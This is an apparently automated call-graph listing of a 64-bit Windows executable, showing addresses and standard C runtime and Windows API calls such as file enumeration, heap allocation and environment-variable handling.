7ff78f485c02 18621->18622 18623 7ff78f485c2b 18622->18623 18624 7ff78f485c0b 18622->18624 18626 7ff78f485c82 18623->18626 18627 7ff78f484050 49 API calls 18623->18627 18625 7ff78f482b30 59 API calls 18624->18625 18646 7ff78f485c21 18625->18646 18628 7ff78f484050 49 API calls 18626->18628 18630 7ff78f485c4c 18627->18630 18629 7ff78f485c9b 18628->18629 18631 7ff78f485cb9 18629->18631 18634 7ff78f482b30 59 API calls 18629->18634 18632 7ff78f485c6a 18630->18632 18636 7ff78f482b30 59 API calls 18630->18636 18635 7ff78f488260 58 API calls 18631->18635 18637 7ff78f483f60 57 API calls 18632->18637 18633 7ff78f48bcc0 _wfindfirst32i64 8 API calls 18638 7ff78f48346e 18633->18638 18634->18631 18639 7ff78f485cc6 18635->18639 18636->18632 18640 7ff78f485c74 18637->18640 18638->16555 18647 7ff78f485d20 18638->18647 18641 7ff78f485ced 18639->18641 18642 7ff78f485ccb 18639->18642 18640->18626 18645 7ff78f488260 58 API calls 18640->18645 18717 7ff78f4851e0 GetProcAddress 18641->18717 18643 7ff78f4829e0 57 API calls 18642->18643 18643->18646 18645->18626 18646->18633 18801 7ff78f484de0 18647->18801 18649 7ff78f485d44 18650 7ff78f485d5d 18649->18650 18651 7ff78f485d4c 18649->18651 18808 7ff78f484530 18650->18808 18653 7ff78f482b30 59 API calls 18651->18653 18718 7ff78f485202 18717->18718 18719 7ff78f485220 GetProcAddress 18717->18719 18722 7ff78f4829e0 57 API calls 18718->18722 18719->18718 18720 7ff78f485245 GetProcAddress 18719->18720 18720->18718 18721 7ff78f48526a GetProcAddress 18720->18721 18721->18718 18804 7ff78f484e05 18801->18804 18802 7ff78f484e0d 18802->18649 18803 7ff78f48514a __std_exception_destroy 18803->18649 18804->18802 18806 7ff78f484f9f 18804->18806 18843 7ff78f496fb8 18804->18843 18805 7ff78f484250 47 API calls 18805->18806 18806->18803 18806->18805 18844 7ff78f496fe8 18843->18844 18847 7ff78f4964b4 18844->18847 18848 7ff78f4964e5 18847->18848 18849 7ff78f4964f7 18847->18849 19612 7ff78f4a1d20 19623 7ff78f4a7cb4 19612->19623 19624 7ff78f4a7cc1 19623->19624 19625 7ff78f49af0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19624->19625 19626 7ff78f4a7cdd 19624->19626 19625->19624 19627 7ff78f49af0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19626->19627 19628 7ff78f4a1d29 19626->19628 19627->19626 19629 7ff78f4a0cb8 EnterCriticalSection 19628->19629 18927 7ff78f497e4c 18928 7ff78f497eb3 18927->18928 18929 7ff78f497e7a 18927->18929 18928->18929 18931 7ff78f497eb8 FindFirstFileExW 18928->18931 18930 7ff78f4954c4 _get_daylight 11 API calls 18929->18930 18932 7ff78f497e7f 18930->18932 18933 7ff78f497f21 18931->18933 18934 7ff78f497eda GetLastError 18931->18934 18935 7ff78f49aea4 _invalid_parameter_noinfo 37 API calls 18932->18935 18987 7ff78f4980bc 18933->18987 18937 7ff78f497f11 18934->18937 18938 7ff78f497ee5 18934->18938 18939 7ff78f497e8a 18935->18939 18940 7ff78f4954c4 _get_daylight 11 API calls 18937->18940 18938->18937 18942 7ff78f497eef 18938->18942 18943 7ff78f497f01 18938->18943 18947 7ff78f48bcc0 _wfindfirst32i64 8 API calls 18939->18947 18940->18939 18942->18937 18945 7ff78f497ef4 18942->18945 18946 7ff78f4954c4 _get_daylight 11 API calls 18943->18946 18944 7ff78f4980bc _wfindfirst32i64 10 API calls 18948 7ff78f497f47 18944->18948 18949 7ff78f4954c4 _get_daylight 11 API calls 18945->18949 18946->18939 18950 7ff78f497e9e 18947->18950 18951 7ff78f4980bc _wfindfirst32i64 10 API calls 18948->18951 18949->18939 18952 7ff78f497f55 18951->18952 18953 7ff78f4a0e54 _wfindfirst32i64 37 API calls 18952->18953 18954 7ff78f497f73 18953->18954 18954->18939 18955 7ff78f497f7f 18954->18955 18956 7ff78f49aec4 _wfindfirst32i64 17 API calls 18955->18956 18957 7ff78f497f93 18956->18957 18958 7ff78f497fbd 18957->18958 18960 7ff78f497ffc FindNextFileW 18957->18960 18959 7ff78f4954c4 _get_daylight 11 API calls 18958->18959 18961 7ff78f497fc2 18959->18961 18962 7ff78f49800b GetLastError 18960->18962 18963 7ff78f49804c 18960->18963 18964 7ff78f49aea4 _invalid_parameter_noinfo 37 API calls 18961->18964 18966 7ff78f49803f 18962->18966 18967 7ff78f498016 18962->18967 18965 7ff78f4980bc _wfindfirst32i64 10 API calls 18963->18965 18980 7ff78f497fcd 18964->18980 18968 7ff78f498064 18965->18968 18969 7ff78f4954c4 _get_daylight 11 API calls 18966->18969 18967->18966 18971 7ff78f498020 18967->18971 18972 7ff78f498032 18967->18972 18970 7ff78f4980bc _wfindfirst32i64 10 API calls 18968->18970 18969->18980 18974 7ff78f498072 18970->18974 18971->18966 18975 7ff78f498025 18971->18975 18976 7ff78f4954c4 _get_daylight 11 API calls 18972->18976 18973 7ff78f48bcc0 _wfindfirst32i64 8 API calls 18977 7ff78f497fe0 18973->18977 18978 7ff78f4980bc _wfindfirst32i64 10 API calls 18974->18978 18979 7ff78f4954c4 _get_daylight 11 API calls 18975->18979 18976->18980 18981 7ff78f498080 18978->18981 18979->18980 18980->18973 18982 7ff78f4a0e54 _wfindfirst32i64 37 API calls 18981->18982 18983 7ff78f49809e 18982->18983 18983->18980 18984 7ff78f4980a6 18983->18984 18985 7ff78f49aec4 _wfindfirst32i64 17 API calls 18984->18985 18986 7ff78f4980ba 18985->18986 18988 7ff78f4980d4 18987->18988 18989 7ff78f4980da FileTimeToSystemTime 18987->18989 18988->18989 18992 7ff78f4980ff 18988->18992 18990 7ff78f4980e9 SystemTimeToTzSpecificLocalTime 18989->18990 18989->18992 18990->18992 18991 7ff78f48bcc0 _wfindfirst32i64 8 API calls 18993 7ff78f497f39 18991->18993 18992->18991 18993->18944 15171 7ff78f48b240 15172 7ff78f48b26e 15171->15172 15173 7ff78f48b255 15171->15173 15173->15172 15176 7ff78f49dbbc 15173->15176 15177 7ff78f49dc07 15176->15177 15181 7ff78f49dbcb _get_daylight 15176->15181 15186 7ff78f4954c4 15177->15186 15179 7ff78f49dbee HeapAlloc 15180 7ff78f48b2cc 15179->15180 15179->15181 15181->15177 15181->15179 15183 7ff78f4a3c00 15181->15183 15189 7ff78f4a3c40 15183->15189 15195 7ff78f49b888 GetLastError 15186->15195 15188 7ff78f4954cd 15188->15180 15194 7ff78f4a0cb8 EnterCriticalSection 15189->15194 15196 7ff78f49b8c9 FlsSetValue 15195->15196 15200 7ff78f49b8ac 15195->15200 15197 7ff78f49b8db 15196->15197 15201 7ff78f49b8b9 SetLastError 15196->15201 15212 7ff78f49f158 15197->15212 15200->15196 15200->15201 15201->15188 15203 7ff78f49b908 FlsSetValue 15206 7ff78f49b914 FlsSetValue 15203->15206 15207 7ff78f49b926 15203->15207 15204 7ff78f49b8f8 FlsSetValue 15205 7ff78f49b901 15204->15205 15219 7ff78f49af0c 15205->15219 15206->15205 15225 7ff78f49b4b8 15207->15225 15218 7ff78f49f169 _get_daylight 15212->15218 15213 7ff78f49f1ba 15215 7ff78f4954c4 _get_daylight 10 API calls 15213->15215 15214 7ff78f49f19e HeapAlloc 15216 7ff78f49b8ea 15214->15216 15214->15218 15215->15216 15216->15203 15216->15204 15217 7ff78f4a3c00 _get_daylight 2 API calls 15217->15218 15218->15213 15218->15214 15218->15217 15220 7ff78f49af11 RtlFreeHeap 15219->15220 15224 7ff78f49af40 15219->15224 15221 7ff78f49af2c GetLastError 15220->15221 15220->15224 15222 7ff78f49af39 Concurrency::details::SchedulerProxy::DeleteThis 15221->15222 15223 7ff78f4954c4 _get_daylight 9 API calls 15222->15223 15223->15224 15224->15201 15230 7ff78f49b390 15225->15230 15242 7ff78f4a0cb8 EnterCriticalSection 15230->15242 15393 7ff78f4a0f38 15394 7ff78f4a0f5c 15393->15394 15397 7ff78f4a0f6c 15393->15397 15395 7ff78f4954c4 _get_daylight 11 API calls 15394->15395 15396 7ff78f4a0f61 15395->15396 15398 7ff78f4a124c 15397->15398 15399 7ff78f4a0f8e 15397->15399 15400 7ff78f4954c4 _get_daylight 11 API calls 15398->15400 15401 7ff78f4a0faf 15399->15401 15548 7ff78f4a15f4 15399->15548 15402 7ff78f4a1251 15400->15402 15405 7ff78f4a1021 15401->15405 15407 7ff78f4a0fd5 15401->15407 15412 7ff78f4a1015 15401->15412 15404 7ff78f49af0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15402->15404 15404->15396 15409 7ff78f49f158 _get_daylight 11 API calls 15405->15409 15422 7ff78f4a0fe4 15405->15422 15406 7ff78f4a10ce 15415 7ff78f4a10eb 15406->15415 15423 7ff78f4a113d 15406->15423 15563 7ff78f499c50 15407->15563 15413 7ff78f4a1037 15409->15413 15411 7ff78f49af0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15411->15396 15412->15406 15412->15422 15569 7ff78f4a79fc 15412->15569 15416 7ff78f49af0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15413->15416 15419 7ff78f49af0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15415->15419 15420 7ff78f4a1045 15416->15420 15417 7ff78f4a0fdf 15421 7ff78f4954c4 _get_daylight 11 API calls 15417->15421 15418 7ff78f4a0ffd 15418->15412 15425 7ff78f4a15f4 45 API calls 15418->15425 15424 7ff78f4a10f4 15419->15424 15420->15412 15420->15422 15428 7ff78f49f158 _get_daylight 11 API calls 15420->15428 15421->15422 15422->15411 15423->15422 15426 7ff78f4a3a4c 40 API calls 15423->15426 15427 7ff78f4a10f9 15424->15427 15605 7ff78f4a3a4c 15424->15605 15425->15412 15429 7ff78f4a117a 15426->15429 15435 7ff78f4a1240 15427->15435 15439 7ff78f49f158 _get_daylight 11 API calls 15427->15439 15430 7ff78f4a1067 15428->15430 15431 7ff78f49af0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15429->15431 15433 7ff78f49af0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15430->15433 15434 7ff78f4a1184 15431->15434 15433->15412 15434->15422 15434->15427 15437 7ff78f49af0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15435->15437 15436 7ff78f4a1125 15438 7ff78f49af0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15436->15438 15437->15396 15438->15427 15440 7ff78f4a11c8 15439->15440 15441 7ff78f4a11d0 15440->15441 15442 7ff78f4a11d9 15440->15442 15443 7ff78f49af0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15441->15443 15524 7ff78f49aa3c 15442->15524 15445 7ff78f4a11d7 15443->15445 15451 7ff78f49af0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15445->15451 15447 7ff78f4a11f0 15614 7ff78f4a7b14 15447->15614 15448 7ff78f4a127b 15450 7ff78f49aec4 _wfindfirst32i64 17 API calls 15448->15450 15453 7ff78f4a128f 15450->15453 15451->15396 15456 7ff78f4a12b8 15453->15456 15461 7ff78f4a12c8 15453->15461 15454 7ff78f4a1238 15458 7ff78f49af0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15454->15458 15455 7ff78f4a1217 15459 7ff78f4954c4 _get_daylight 11 API calls 15455->15459 15457 7ff78f4954c4 _get_daylight 11 API calls 15456->15457 15485 7ff78f4a12bd 15457->15485 15458->15435 15460 7ff78f4a121c 15459->15460 15463 7ff78f49af0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15460->15463 15462 7ff78f4a15ab 15461->15462 15464 7ff78f4a12ea 15461->15464 15465 7ff78f4954c4 _get_daylight 11 API calls 15462->15465 15463->15445 15466 7ff78f4a1307 15464->15466 15533 7ff78f4a16dc 15464->15533 15467 7ff78f4a15b0 15465->15467 15470 7ff78f4a137b 15466->15470 15472 7ff78f4a132f 15466->15472 15478 7ff78f4a136f 15466->15478 15469 7ff78f49af0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15467->15469 15469->15485 15474 7ff78f4a13a3 15470->15474 15479 7ff78f49f158 _get_daylight 11 API calls 15470->15479 15491 7ff78f4a133e 15470->15491 15471 7ff78f4a142e 15483 7ff78f4a144b 15471->15483 15492 7ff78f4a149e 15471->15492 15633 7ff78f499c8c 15472->15633 15476 7ff78f49f158 _get_daylight 11 API calls 15474->15476 15474->15478 15474->15491 15484 7ff78f4a13c5 15476->15484 15477 7ff78f49af0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15477->15485 15478->15471 15478->15491 15639 7ff78f4a78bc 15478->15639 15486 7ff78f4a1395 15479->15486 15481 7ff78f4a1357 15481->15478 15494 7ff78f4a16dc 45 API calls 15481->15494 15482 7ff78f4a1339 15488 7ff78f4954c4 _get_daylight 11 API calls 15482->15488 15489 7ff78f49af0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15483->15489 15490 7ff78f49af0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15484->15490 15487 7ff78f49af0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15486->15487 15487->15474 15488->15491 15493 7ff78f4a1454 15489->15493 15490->15478 15491->15477 15492->15491 15495 7ff78f4a3a4c 40 API calls 15492->15495 15498 7ff78f4a3a4c 40 API calls 15493->15498 15501 7ff78f4a145a 15493->15501 15494->15478 15496 7ff78f4a14dc 15495->15496 15497 7ff78f49af0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15496->15497 15499 7ff78f4a14e6 15497->15499 15502 7ff78f4a1486 15498->15502 15499->15491 15499->15501 15500 7ff78f4a159f 15503 7ff78f49af0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15500->15503 15501->15500 15505 7ff78f49f158 _get_daylight 11 API calls 15501->15505 15504 7ff78f49af0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15502->15504 15503->15485 15504->15501 15506 7ff78f4a152b 15505->15506 15507 7ff78f4a1533 15506->15507 15508 7ff78f4a153c 15506->15508 15509 7ff78f49af0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15507->15509 15663 7ff78f4a0e54 15508->15663 15511 7ff78f4a153a 15509->15511 15518 7ff78f49af0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15511->15518 15513 7ff78f4a15df 15517 7ff78f49aec4 _wfindfirst32i64 17 API calls 15513->15517 15514 7ff78f4a1552 SetEnvironmentVariableW 15515 7ff78f4a1576 15514->15515 15516 7ff78f4a1597 15514->15516 15520 7ff78f4954c4 _get_daylight 11 API calls 15515->15520 15519 7ff78f49af0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15516->15519 15521 7ff78f4a15f3 15517->15521 15518->15485 15519->15500 15522 7ff78f4a157b 15520->15522 15523 7ff78f49af0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15522->15523 15523->15511 15525 7ff78f49aa53 15524->15525 15526 7ff78f49aa49 15524->15526 15527 7ff78f4954c4 _get_daylight 11 API calls 15525->15527 15526->15525 15531 7ff78f49aa6e 15526->15531 15528 7ff78f49aa5a 15527->15528 15529 7ff78f49aea4 _invalid_parameter_noinfo 37 API calls 15528->15529 15530 7ff78f49aa66 15529->15530 15530->15447 15530->15448 15531->15530 15532 7ff78f4954c4 _get_daylight 11 API calls 15531->15532 15532->15528 15534 7ff78f4a16ff 15533->15534 15535 7ff78f4a171c 15533->15535 15534->15466 15536 7ff78f49f158 _get_daylight 11 API calls 15535->15536 15537 7ff78f4a1740 15536->15537 15539 7ff78f4a17a1 15537->15539 15542 7ff78f49f158 _get_daylight 11 API calls 15537->15542 15543 7ff78f49af0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15537->15543 15544 7ff78f4a0e54 _wfindfirst32i64 37 API calls 15537->15544 15545 7ff78f4a17b0 15537->15545 15547 7ff78f4a17c4 15537->15547 15538 7ff78f49aa9c __CxxCallCatchBlock 45 API calls 15540 7ff78f4a17ca 15538->15540 15541 7ff78f49af0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15539->15541 15541->15534 15542->15537 15543->15537 15544->15537 15546 7ff78f49aec4 _wfindfirst32i64 17 API calls 15545->15546 15546->15547 15547->15538 15549 7ff78f4a1611 15548->15549 15550 7ff78f4a1629 15548->15550 15549->15401 15551 7ff78f49f158 _get_daylight 11 API calls 15550->15551 15557 7ff78f4a164d 15551->15557 15552 7ff78f4a16ae 15555 7ff78f49af0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15552->15555 15553 7ff78f49aa9c __CxxCallCatchBlock 45 API calls 15554 7ff78f4a16d8 15553->15554 15555->15549 15556 7ff78f49f158 _get_daylight 11 API calls 15556->15557 15557->15552 15557->15556 15558 7ff78f49af0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15557->15558 15559 7ff78f49aa3c __std_exception_copy 37 API calls 15557->15559 15560 7ff78f4a16bd 15557->15560 15562 7ff78f4a16d2 15557->15562 15558->15557 15559->15557 15561 7ff78f49aec4 _wfindfirst32i64 17 API calls 15560->15561 15561->15562 15562->15553 15564 7ff78f499c60 15563->15564 15567 7ff78f499c69 15563->15567 15564->15567 15672 7ff78f499728 15564->15672 15567->15417 15567->15418 15570 7ff78f4a7a09 15569->15570 15571 7ff78f4a6bac 15569->15571 15572 7ff78f494f98 45 API calls 15570->15572 15575 7ff78f4a6bef 15571->15575 15577 7ff78f4a6bb9 15571->15577 15573 7ff78f4a7a3d 15572->15573 15578 7ff78f4a7a42 15573->15578 15581 7ff78f4a7a53 15573->15581 15585 7ff78f4a7a6a 15573->15585 15574 7ff78f4954c4 _get_daylight 11 API calls 15579 7ff78f4a6bc3 15574->15579 15576 7ff78f4a6c19 15575->15576 15584 7ff78f4a6c3e 15575->15584 15580 7ff78f4954c4 _get_daylight 11 API calls 15576->15580 15577->15574 15593 7ff78f4a6b60 15577->15593 15578->15412 15582 7ff78f49aea4 _invalid_parameter_noinfo 37 API calls 15579->15582 15583 7ff78f4a6c1e 15580->15583 15586 7ff78f4954c4 _get_daylight 11 API calls 15581->15586 15587 7ff78f4a6bce 15582->15587 15588 7ff78f49aea4 _invalid_parameter_noinfo 37 API calls 15583->15588 15589 7ff78f494f98 45 API calls 15584->15589 15596 7ff78f4a6c29 15584->15596 15591 7ff78f4a7a74 15585->15591 15592 7ff78f4a7a86 15585->15592 15590 7ff78f4a7a58 15586->15590 15587->15412 15588->15596 15589->15596 15597 7ff78f49aea4 _invalid_parameter_noinfo 37 API calls 15590->15597 15598 7ff78f4954c4 _get_daylight 11 API calls 15591->15598 15594 7ff78f4a7a97 15592->15594 15595 7ff78f4a7aae 15592->15595 15593->15412 15958 7ff78f4a6bfc 15594->15958 15967 7ff78f4a9824 15595->15967 15596->15412 15597->15578 15601 7ff78f4a7a79 15598->15601 15603 7ff78f49aea4 _invalid_parameter_noinfo 37 API calls 15601->15603 15603->15578 15604 7ff78f4954c4 _get_daylight 11 API calls 15604->15578 15606 7ff78f4a3a8b 15605->15606 15607 7ff78f4a3a6e 15605->15607 15611 7ff78f4a3a95 15606->15611 16007 7ff78f4a8508 15606->16007 15607->15606 15608 7ff78f4a3a7c 15607->15608 15609 7ff78f4954c4 _get_daylight 11 API calls 15608->15609 15613 7ff78f4a3a81 __scrt_get_show_window_mode 15609->15613 16014 7ff78f4a0ebc 15611->16014 15613->15436 15615 7ff78f494f98 45 API calls 15614->15615 15616 7ff78f4a7b7a 15615->15616 15617 7ff78f4a7b88 15616->15617 16026 7ff78f49f3e4 15616->16026 16029 7ff78f495584 15617->16029 15621 7ff78f4a7c74 15624 7ff78f4a7c85 15621->15624 15625 7ff78f49af0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15621->15625 15622 7ff78f494f98 45 API calls 15623 7ff78f4a7bf7 15622->15623 15627 7ff78f49f3e4 5 API calls 15623->15627 15630 7ff78f4a7c00 15623->15630 15626 7ff78f4a1213 15624->15626 15628 7ff78f49af0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15624->15628 15625->15624 15626->15454 15626->15455 15627->15630 15628->15626 15629 7ff78f495584 14 API calls 15631 7ff78f4a7c5b 15629->15631 15630->15629 15631->15621 15632 7ff78f4a7c63 SetEnvironmentVariableW 15631->15632 15632->15621 15634 7ff78f499c9c 15633->15634 15635 7ff78f499ca5 15633->15635 15634->15635 16056 7ff78f49979c 15634->16056 15635->15481 15635->15482 15640 7ff78f4a78c9 15639->15640 15644 7ff78f4a78f6 15639->15644 15641 7ff78f4a78ce 15640->15641 15640->15644 15642 7ff78f4954c4 _get_daylight 11 API calls 15641->15642 15643 7ff78f4a78d3 15642->15643 15646 7ff78f49aea4 _invalid_parameter_noinfo 37 API calls 15643->15646 15645 7ff78f4a793a 15644->15645 15647 7ff78f4a7959 15644->15647 15661 7ff78f4a792e __crtLCMapStringW 15644->15661 15648 7ff78f4954c4 _get_daylight 11 API calls 15645->15648 15649 7ff78f4a78de 15646->15649 15650 7ff78f4a7963 15647->15650 15651 7ff78f4a7975 15647->15651 15652 7ff78f4a793f 15648->15652 15649->15478 15654 7ff78f4954c4 _get_daylight 11 API calls 15650->15654 15655 7ff78f494f98 45 API calls 15651->15655 15653 7ff78f49aea4 _invalid_parameter_noinfo 37 API calls 15652->15653 15653->15661 15656 7ff78f4a7968 15654->15656 15657 7ff78f4a7982 15655->15657 15658 7ff78f49aea4 _invalid_parameter_noinfo 37 API calls 15656->15658 15657->15661 16103 7ff78f4a93e0 15657->16103 15658->15661 15661->15478 15662 7ff78f4954c4 _get_daylight 11 API calls 15662->15661 15664 7ff78f4a0e61 15663->15664 15665 7ff78f4a0e6b 15663->15665 15664->15665 15670 7ff78f4a0e87 15664->15670 15666 7ff78f4954c4 _get_daylight 11 API calls 15665->15666 15667 7ff78f4a0e73 15666->15667 15669 7ff78f49aea4 _invalid_parameter_noinfo 37 API calls 15667->15669 15668 7ff78f4a0e7f 15668->15513 15668->15514 15669->15668 15670->15668 15671 7ff78f4954c4 _get_daylight 11 API calls 15670->15671 15671->15667 15673 7ff78f499741 15672->15673 15686 7ff78f49973d 15672->15686 15695 7ff78f4a2c60 15673->15695 15678 7ff78f49975f 15721 7ff78f49980c 15678->15721 15679 7ff78f499753 15680 7ff78f49af0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15679->15680 15680->15686 15683 7ff78f49af0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15684 7ff78f499786 15683->15684 15685 7ff78f49af0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15684->15685 15685->15686 15686->15567 15687 7ff78f499a7c 15686->15687 15688 7ff78f499aa5 15687->15688 15693 7ff78f499abe 15687->15693 15688->15567 15689 7ff78f49f158 _get_daylight 11 API calls 15689->15693 15690 7ff78f499b4e 15692 7ff78f49af0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15690->15692 15691 7ff78f4a04c8 WideCharToMultiByte 15691->15693 15692->15688 15693->15688 15693->15689 15693->15690 15693->15691 15694 7ff78f49af0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15693->15694 15694->15693 15696 7ff78f4a2c6d 15695->15696 15700 7ff78f499746 15695->15700 15740 7ff78f49b7e4 15696->15740 15701 7ff78f4a2f9c GetEnvironmentStringsW 15700->15701 15702 7ff78f49974b 15701->15702 15704 7ff78f4a2fcc 15701->15704 15702->15678 15702->15679 15703 7ff78f4a04c8 WideCharToMultiByte 15705 7ff78f4a301d 15703->15705 15704->15703 15706 7ff78f4a3024 FreeEnvironmentStringsW 15705->15706 15707 7ff78f49dbbc _fread_nolock 12 API calls 15705->15707 15706->15702 15708 7ff78f4a3037 15707->15708 15709 7ff78f4a303f 15708->15709 15710 7ff78f4a3048 15708->15710 15712 7ff78f49af0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15709->15712 15711 7ff78f4a04c8 WideCharToMultiByte 15710->15711 15714 7ff78f4a306b 15711->15714 15713 7ff78f4a3046 15712->15713 15713->15706 15715 7ff78f4a306f 15714->15715 15716 7ff78f4a3079 15714->15716 15717 7ff78f49af0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15715->15717 15718 7ff78f49af0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15716->15718 15719 7ff78f4a3077 FreeEnvironmentStringsW 15717->15719 15718->15719 15719->15702 15722 7ff78f499831 15721->15722 15723 7ff78f49f158 _get_daylight 11 API calls 15722->15723 15734 7ff78f499867 15723->15734 15724 7ff78f49986f 15725 7ff78f49af0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15724->15725 15726 7ff78f499767 15725->15726 15726->15683 15727 7ff78f4998e2 15728 7ff78f49af0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15727->15728 15728->15726 15729 7ff78f49f158 _get_daylight 11 API calls 15729->15734 15730 7ff78f4998d1 15952 7ff78f499a38 15730->15952 15731 7ff78f49aa3c __std_exception_copy 37 API calls 15731->15734 15734->15724 15734->15727 15734->15729 15734->15730 15734->15731 15735 7ff78f499907 15734->15735 15738 7ff78f49af0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15734->15738 15737 7ff78f49aec4 _wfindfirst32i64 17 API calls 15735->15737 15736 7ff78f49af0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15736->15724 15739 7ff78f49991a 15737->15739 15738->15734 15741 7ff78f49b810 FlsSetValue 15740->15741 15742 7ff78f49b7f5 FlsGetValue 15740->15742 15743 7ff78f49b802 15741->15743 15745 7ff78f49b81d 15741->15745 15742->15743 15744 7ff78f49b80a 15742->15744 15746 7ff78f49b808 15743->15746 15747 7ff78f49aa9c __CxxCallCatchBlock 45 API calls 15743->15747 15744->15741 15748 7ff78f49f158 _get_daylight 11 API calls 15745->15748 15760 7ff78f4a2934 15746->15760 15749 7ff78f49b885 15747->15749 15750 7ff78f49b82c 15748->15750 15751 7ff78f49b84a FlsSetValue 15750->15751 15752 7ff78f49b83a FlsSetValue 15750->15752 15754 7ff78f49b856 FlsSetValue 15751->15754 15755 7ff78f49b868 15751->15755 15753 7ff78f49b843 15752->15753 15756 7ff78f49af0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15753->15756 15754->15753 15757 7ff78f49b4b8 _get_daylight 11 API calls 15755->15757 15756->15743 15758 7ff78f49b870 15757->15758 15759 7ff78f49af0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15758->15759 15759->15746 15783 7ff78f4a2ba4 15760->15783 15762 7ff78f4a2969 15798 7ff78f4a2634 15762->15798 15765 7ff78f49dbbc _fread_nolock 12 API calls 15766 7ff78f4a2997 15765->15766 15767 7ff78f4a299f 15766->15767 15769 7ff78f4a29ae 15766->15769 15768 7ff78f49af0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15767->15768 15782 7ff78f4a2986 15768->15782 15769->15769 15805 7ff78f4a2cdc 15769->15805 15772 7ff78f4a2aaa 15773 7ff78f4954c4 _get_daylight 11 API calls 15772->15773 15775 7ff78f4a2aaf 15773->15775 15774 7ff78f4a2b05 15781 7ff78f4a2b6c 15774->15781 15816 7ff78f4a2464 15774->15816 15777 7ff78f49af0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15775->15777 15776 7ff78f4a2ac4 15776->15774 15778 7ff78f49af0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15776->15778 15777->15782 15778->15774 15780 7ff78f49af0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15780->15782 15781->15780 15782->15700 15784 7ff78f4a2bc7 15783->15784 15787 7ff78f4a2bd1 15784->15787 15831 7ff78f4a0cb8 EnterCriticalSection 15784->15831 15786 7ff78f4a2c43 15786->15762 15787->15786 15791 7ff78f49aa9c __CxxCallCatchBlock 45 API calls 15787->15791 15792 7ff78f4a2c5b 15791->15792 15794 7ff78f4a2cb2 15792->15794 15795 7ff78f49b7e4 50 API calls 15792->15795 15794->15762 15796 7ff78f4a2c9c 15795->15796 15797 7ff78f4a2934 65 API calls 15796->15797 15797->15794 15832 7ff78f494f98 15798->15832 15801 7ff78f4a2654 GetOEMCP 15803 7ff78f4a267b 15801->15803 15802 7ff78f4a2666 15802->15803 15804 7ff78f4a266b GetACP 15802->15804 15803->15765 15803->15782 15804->15803 15806 7ff78f4a2634 47 API calls 15805->15806 15809 7ff78f4a2d09 15806->15809 15807 7ff78f4a2e5f 15810 7ff78f48bcc0 _wfindfirst32i64 8 API calls 15807->15810 15808 7ff78f4a2d60 __scrt_get_show_window_mode 15864 7ff78f4a274c 15808->15864 15809->15807 15809->15808 15811 7ff78f4a2d46 IsValidCodePage 15809->15811 15812 7ff78f4a2aa1 15810->15812 15811->15807 15813 7ff78f4a2d57 15811->15813 15812->15772 15812->15776 15813->15808 15814 7ff78f4a2d86 GetCPInfo 15813->15814 15814->15807 15814->15808 15951 7ff78f4a0cb8 EnterCriticalSection 15816->15951 15833 7ff78f494fb7 15832->15833 15834 7ff78f494fbc 15832->15834 15833->15801 15833->15802 15834->15833 15835 7ff78f49b710 __CxxCallCatchBlock 45 API calls 15834->15835 15836 7ff78f494fd7 15835->15836 15840 7ff78f49df44 15836->15840 15841 7ff78f494ffa 15840->15841 15842 7ff78f49df59 15840->15842 15844 7ff78f49dfb0 15841->15844 15842->15841 15848 7ff78f4a3974 15842->15848 15845 7ff78f49dfc5 15844->15845 15846 7ff78f49dfd8 15844->15846 15845->15846 15861 7ff78f4a2cc0 15845->15861 15846->15833 15849 7ff78f49b710 __CxxCallCatchBlock 45 API calls 15848->15849 15850 7ff78f4a3983 15849->15850 15851 7ff78f4a39ce 15850->15851 15860 7ff78f4a0cb8 EnterCriticalSection 15850->15860 15851->15841 15862 7ff78f49b710 